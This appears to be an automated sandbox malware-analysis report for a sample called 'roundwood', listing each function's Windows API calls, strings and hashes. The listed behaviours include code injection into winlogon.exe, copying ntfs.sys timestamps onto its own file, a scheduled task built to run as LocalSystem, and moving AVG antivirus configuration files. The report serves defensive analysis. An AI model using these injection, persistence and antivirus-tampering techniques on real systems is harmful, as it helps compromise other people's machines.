IsBadWritePtr.KERNEL32(?,00000004,755CDB30,?,00000000,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 004014F5

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
String ID:
API String ID: 213124939-0
Opcode ID: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction ID: 1e88e17013718af7825f0840a72b71bc919ec8abe2a586386afbdd05d1fe9019
Opcode Fuzzy Hash: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction Fuzzy Hash: C04156B1900214BBE7219FE59D89FAFBB7CEB84B11F104125FB04B72D0D774594487A8

Function 004019B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004019C8
memset.MSVCRT ref: 004019EE
lstrcpynA.KERNEL32(?,?+@,00000104,?,?,?,755CDB30,00000000,00000000), ref: 00401A06
CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,755CDB30,00000000,00000000), ref: 00401A29
GetHandleInformation.KERNEL32(?,?+@,?,?,?,755CDB30,00000000,00000000), ref: 00401A4A
CloseHandle.KERNEL32(?,?,?,?,755CDB30,00000000,00000000), ref: 00401A57
GetHandleInformation.KERNEL32(?,?+@,?,?,?,755CDB30,00000000,00000000), ref: 00401A6E
CloseHandle.KERNEL32(?,?,?,?,755CDB30,00000000,00000000), ref: 00401A7B

Strings

D, xrefs: 00401A22
?+@, xrefs: 004019F3, 00401A69, 00401A45, 004019FE, 00401A48, 00401A6C

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
String ID: ?+@$D
API String ID: 2248944234-1654856090
Opcode ID: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction ID: b4650b333af88615931ce45c43086d11ba0b8feb79f29fc85485a8f74bed1c81
Opcode Fuzzy Hash: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction Fuzzy Hash: C82153B2A002096FDB10DFE4DC84AEF7BBCAB54354F00417AEA05F6251D6749A45CBA4

Function 00401EA0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 76
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,755CDB30,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EC5
GetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?,?,?), ref: 00401EDF
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EF5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F06
CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F22
SetFileTime.KERNELBASE(00000000,?,?,*@,?,?,?,?,?,00402AE7,?), ref: 00401F38
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F4E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F5F

Strings

*@, xrefs: 00401ED2, 00401F2B, 00401ED5, 00401F2E
\\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401EC0

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateInformationTime
String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys$*@
API String ID: 1046229350-2079472752
Opcode ID: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction ID: 505fd7f37fca788128ae4fd827e8faf93d8922700b858b40f06f957d70fc4d32
Opcode Fuzzy Hash: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction Fuzzy Hash: FA21967250021876D7219B64DC49FEFBB6CAF98750F144225FF01B61E0D7B45A4586E8

Function 00401520 Relevance: 13.6, APIs: 9, Instructions: 66
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C), ref: 0040154F
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401565
PathFileExistsA.KERNELBASE(?), ref: 00401572
GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401589
GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 004015A1
MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004015BD
SetFileAttributesA.KERNELBASE(?,00000000), ref: 004015CC
DeleteFileA.KERNELBASE(?), ref: 004015D9
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004015ED

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
String ID:
API String ID: 2787354276-0
Opcode ID: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction ID: 1f2af84f05926cbb5e0b354959f29bdceae47d8b45da359f5ec46e55e0df53d3
Opcode Fuzzy Hash: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction Fuzzy Hash: 3F21FCB1D00219AFDB10DBA0DD49FEA77BCAB48700F0045AAA709F6190EB749B448FA5

Function 004012E0 Relevance: 12.1, APIs: 8, Instructions: 84fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,755CDB30,?,00401E75,00000000), ref: 00401317
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,00401E75,00000000), ref: 0040132C
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040133B
WriteFile.KERNELBASE(00000000,?,00000000,00401E75,00000000,?,00401E75,00000000), ref: 0040134D
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040135D
SetEndOfFile.KERNELBASE(00000000), ref: 0040136A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040138C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040139D

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindHandleInformationLockNotificationPointerUnlockWrite
String ID:
API String ID: 2878253294-0
Opcode ID: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction ID: fc3a19f52fd50960abd89716b3b21a8dc97a86bf959a0b9d512ee5003149b17c
Opcode Fuzzy Hash: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction Fuzzy Hash: 0E21BE71A00204BBF7205B65DD4DFAB7A6CEBC1B51F148126FF00B66E0D7B84E81C6A8

Function 00401AA0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401AC4
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401ACF
Process32First.KERNEL32 ref: 00401AF5
StrStrIA.SHLWAPI(?,004010DF), ref: 00401B10
Process32Next.KERNEL32(00000000,?), ref: 00401B1C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B38
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstHandleInformationNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 3068433855-0
Opcode ID: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction ID: dd63a524005d9bd3fdf31d3318007fe9a0ed814c8c3d3d806708decfbcb8f66e
Opcode Fuzzy Hash: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction Fuzzy Hash: 9611EBB25043105BC310EF55DC48A9BBBACEBD5360F00453AFE55A3290E734E949CBEA

Function 00402430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402448
MoveFileA.KERNEL32(?,?), ref: 0040250F

Strings

\AVG\AVG9\dfncfg.dat, xrefs: 00402488
\AVG\AVG9\dfmcfg.dat, xrefs: 004024CC

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: FileFolderMovePath
String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
API String ID: 1404575960-1083204512
Opcode ID: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction ID: 2817f7f5a2ee45723a7bffe92fbd27ee54b29152b6db55fc9663a9b726faa6ae
Opcode Fuzzy Hash: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction Fuzzy Hash: 172151B45042448FC719CF14EA98B92BBF1BB88300F1581F9DA99A73B2D6B0D944CF98

Function 0040217A Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000), ref: 0040218C

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction ID: d0e749ada70b16f267b0096a5882ad0ed8cb575b22d8ef64c6acb779e6c27845
Opcode Fuzzy Hash: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction Fuzzy Hash: B6D05E76E05729CBCB20DF94A5052AEF730FB45731F0083AADE247338083351C118AD4

Non-executed Functions

Function 004033B0 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004033FE
memset.MSVCRT ref: 0040341E
memset.MSVCRT ref: 0040343E
IsUserAnAdmin.SHELL32 ref: 00403446
GetVersionExA.KERNEL32 ref: 00403461

Part of subcall function 00403310: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
Part of subcall function 00403310: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
Part of subcall function 00403310: OpenProcessToken.ADVAPI32(00000000), ref: 00403360
Part of subcall function 00403310: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
Part of subcall function 00403310: CloseHandle.KERNEL32(00000000), ref: 00403397

GetTickCount.KERNEL32 ref: 004034A5
_snwprintf.MSVCRT ref: 004034BE
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE

Strings

<Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 004033C4
task%d, xrefs: 004034AC
00-->, xrefs: 0040368F
<Actions , xrefs: 0040365A
\\?\globalroot\systemroot\system32\tasks\, xrefs: 004033E7
p=)u, xrefs: 0040379B

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=)u$task%d
API String ID: 1601901853-2209026672
Opcode ID: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction ID: 1b369b621c6b50f993c5cfef2b03b24b37f74764d04c33fe2e8d64a6d5fdefe9
Opcode Fuzzy Hash: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction Fuzzy Hash: F8D1C3B1504301ABD720DF64CC49B5B7BE8EFC8715F048A29FA49A72D1E774EA04CB99

Function 00401B70 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401FB0: memset.MSVCRT ref: 00401FD6
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
Part of subcall function 00401FB0: GetLastError.KERNEL32 ref: 00401FF0
Part of subcall function 00401FB0: SwitchToThread.KERNEL32 ref: 00401FFF
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
Part of subcall function 00401FB0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
Part of subcall function 00401FB0: CloseHandle.KERNEL32(00000000), ref: 00402039

Sleep.KERNEL32(00000064,755CDB30,?,00000000,00402DB4,winlogon.exe), ref: 00401B9D
OpenProcess.KERNEL32(001F0FFF,00000000,00000000,755CDB30,?,00000000,00402DB4,winlogon.exe), ref: 00401BBC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401BDB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401BF1
GetCurrentProcess.KERNEL32(00000000), ref: 00401BFD
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401C18
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401C28
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00401C6F
WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401C91
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00401CBD
memcpy.MSVCRT ref: 00401CD8
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401CF3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401D01
WriteProcessMemory.KERNEL32(00000000,?,00406400,00052A00,?), ref: 00401D34
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401D44
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401D56
GetHandleInformation.KERNEL32(00000000), ref: 00401D6E
CloseHandle.KERNEL32(00000000), ref: 00401D7F
RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401DA0
GetHandleInformation.KERNEL32(00000000), ref: 00401DBC
CloseHandle.KERNEL32(00000000), ref: 00401DCD

Strings

kernel32.dll, xrefs: 00401BCF, 00401C0C
IsWow64Process, xrefs: 00401BEB, 00401C22

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 3542510048-3024904723
Opcode ID: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction ID: 1cc1a5b9d3a24803e7d074aebc255e1873ec8508329ddbed26f29eb15fe00603
Opcode Fuzzy Hash: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction Fuzzy Hash: 8E71A2B1640215ABE710DF94DD89FAF77B8AF84701F144029FA01B72D1D7B8A941C7A8

Function 00403310 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
OpenProcessToken.ADVAPI32(00000000), ref: 00403360
GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
CloseHandle.KERNEL32(00000000), ref: 00403397

Strings

\\?\globalroot\systemroot\system32\tasks\, xrefs: 00403319

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
String ID: \\?\globalroot\systemroot\system32\tasks\
API String ID: 4133869067-1576788796
Opcode ID: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction ID: 49b559ea0f9bb78937d1c0884117093763843d0ff56e3b8f35a0dc65749093db
Opcode Fuzzy Hash: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction Fuzzy Hash: E60165B5A00208EBEB20DFA4DD4DB9F7B7CAB44715F0080A6EA05B2280DA749B44DF64

Function 0043A1C0 Relevance: 1.6, Strings: 1, Instructions: 320COMMON

Download Yara Rule

Strings

VUUU, xrefs: 0043A486

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU
API String ID: 0-2040033107
Opcode ID: 91a8ad65bccbbfe05e08020613915b6b43463005f411ac20db4209ee28307917
Instruction ID: f47a8ee1f73e22a4fe4d0782bb31250b05cbd8abf37275be656dc7776c70eb81
Opcode Fuzzy Hash: 91a8ad65bccbbfe05e08020613915b6b43463005f411ac20db4209ee28307917
Instruction Fuzzy Hash: 43C13671A4065657C728CF69C9802BAFBF2BF58310F08A26EE4D2C6B81E23CF594C755

Function 00423460 Relevance: .8, Instructions: 833COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078465a8c5f966f900ef0431eae93261a578a5e790f795112f798ddb2a924d92
Instruction ID: fb4bf73fbd96ce767e3e4ced4cff5850fb0c5de91f2901caa32f86ddb58664f3
Opcode Fuzzy Hash: 078465a8c5f966f900ef0431eae93261a578a5e790f795112f798ddb2a924d92
Instruction Fuzzy Hash: DC6266302083669FD711DF748998AAB7BF4EF8B342F448559E481C7322EB39C949C799

Function 00447A4D Relevance: .8, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6cf6006001199e5e9ce8d23d257b0a33bb280d4706fab0d3690263e39bb01c
Instruction ID: 557c3a5e0be627a1a0d82d054954a5a553f0d272665adbf2aa8904b654ae6415
Opcode Fuzzy Hash: 0b6cf6006001199e5e9ce8d23d257b0a33bb280d4706fab0d3690263e39bb01c
Instruction Fuzzy Hash: A962BD70E04A269BDB08CF55C8902FDBBB2FF84311F14826EC81667B84DB796956CF94

Function 00435230 Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5036dd47c7d37404f61d9253acab986b19dacab9ed83d46aeccfe24d09195b14
Instruction ID: 85909a87914b4e267680ae93a060971746addf1db64755a8a3bc2181f2046f0f
Opcode Fuzzy Hash: 5036dd47c7d37404f61d9253acab986b19dacab9ed83d46aeccfe24d09195b14
Instruction Fuzzy Hash: 5F42E0719006499FDB24DFA8C880BEFBBF5AF4C304F14555EE446A7342D778A942CBA8

Function 00445C60 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ffc4eb06bca0d5c3d9a2dea77500c2ca13b45209916c823031000f489548c1
Instruction ID: 85a937299a81f3d9309945d58e9e442e46b363752c2a3cd2ae91a7182d9b7112
Opcode Fuzzy Hash: 00ffc4eb06bca0d5c3d9a2dea77500c2ca13b45209916c823031000f489548c1
Instruction Fuzzy Hash: 0A120630A05B449FEB21CF18C5806AEBBF1FF46310F14859AE4A68B392C339ED46CB55

Function 00446330 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f797997eb54f774182d1461cf03963e7959118e080bee31629b5adcb6e64841a
Instruction ID: 46b84cad4234f5ce45083a22f3b7837f8dbab4e6c9ff07cf73690a7c3839c88d
Opcode Fuzzy Hash: f797997eb54f774182d1461cf03963e7959118e080bee31629b5adcb6e64841a
Instruction Fuzzy Hash: 8412F4309057849FEB25CF18C490AAABBF1BF53314F15859EE8A54B391C338E946CB56

Function 00445590 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4287607630ae20b9aa5277460d30b0afbc744c63664bd41df3638ca158418c96
Instruction ID: e557182fb19255dd362c8294d5405afe168e67028f96bc1afb08ac6ffecb48eb
Opcode Fuzzy Hash: 4287607630ae20b9aa5277460d30b0afbc744c63664bd41df3638ca158418c96
Instruction Fuzzy Hash: F512D130A05B459FEF21CF18C590AAEB7F2FF55310F14856AE8A65B392C738AD42CB54

Function 00444300 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1b91ede640c16b6eb738e208c258cded16843dd2e2204d56f86606c58ff67d
Instruction ID: 6a0df0345f276ddaee371dcc3f576922ba37433c1e1455ba353acb30c9ea1d0b
Opcode Fuzzy Hash: 8a1b91ede640c16b6eb738e208c258cded16843dd2e2204d56f86606c58ff67d
Instruction Fuzzy Hash: 9612D534A057859FEB21CF18C58079EBBF1BF96710F14859AE8A58B381C338ED46CB65

Function 00442B10 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873571734b46908c23de2a9ae6b9989397ee1cde3a23e753d5dfb42290629ecf
Instruction ID: 55551379100cdf018b1de4a285b7f8ac93436360615d4dad2d0621f8c6cf7646
Opcode Fuzzy Hash: 873571734b46908c23de2a9ae6b9989397ee1cde3a23e753d5dfb42290629ecf
Instruction Fuzzy Hash: BA021430A017459FEB24CF18C580AAFB7F1FF41310F54855AE8A58B391D379AD46CBA4

Function 00441EB0 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55246aaccc6255ecd0cb00e4f85a6f18806050463415470c8e688bca06ee7ecd
Instruction ID: cc554ed878a3e3a83374983980d7ee594483d7f74ccf43b721c7f55668250d4c
Opcode Fuzzy Hash: 55246aaccc6255ecd0cb00e4f85a6f18806050463415470c8e688bca06ee7ecd
Instruction Fuzzy Hash: 79020630A017459FEB24CF28C5806AFB7F1FF41310F54819AE8A58B391D7B8AD86C7A5

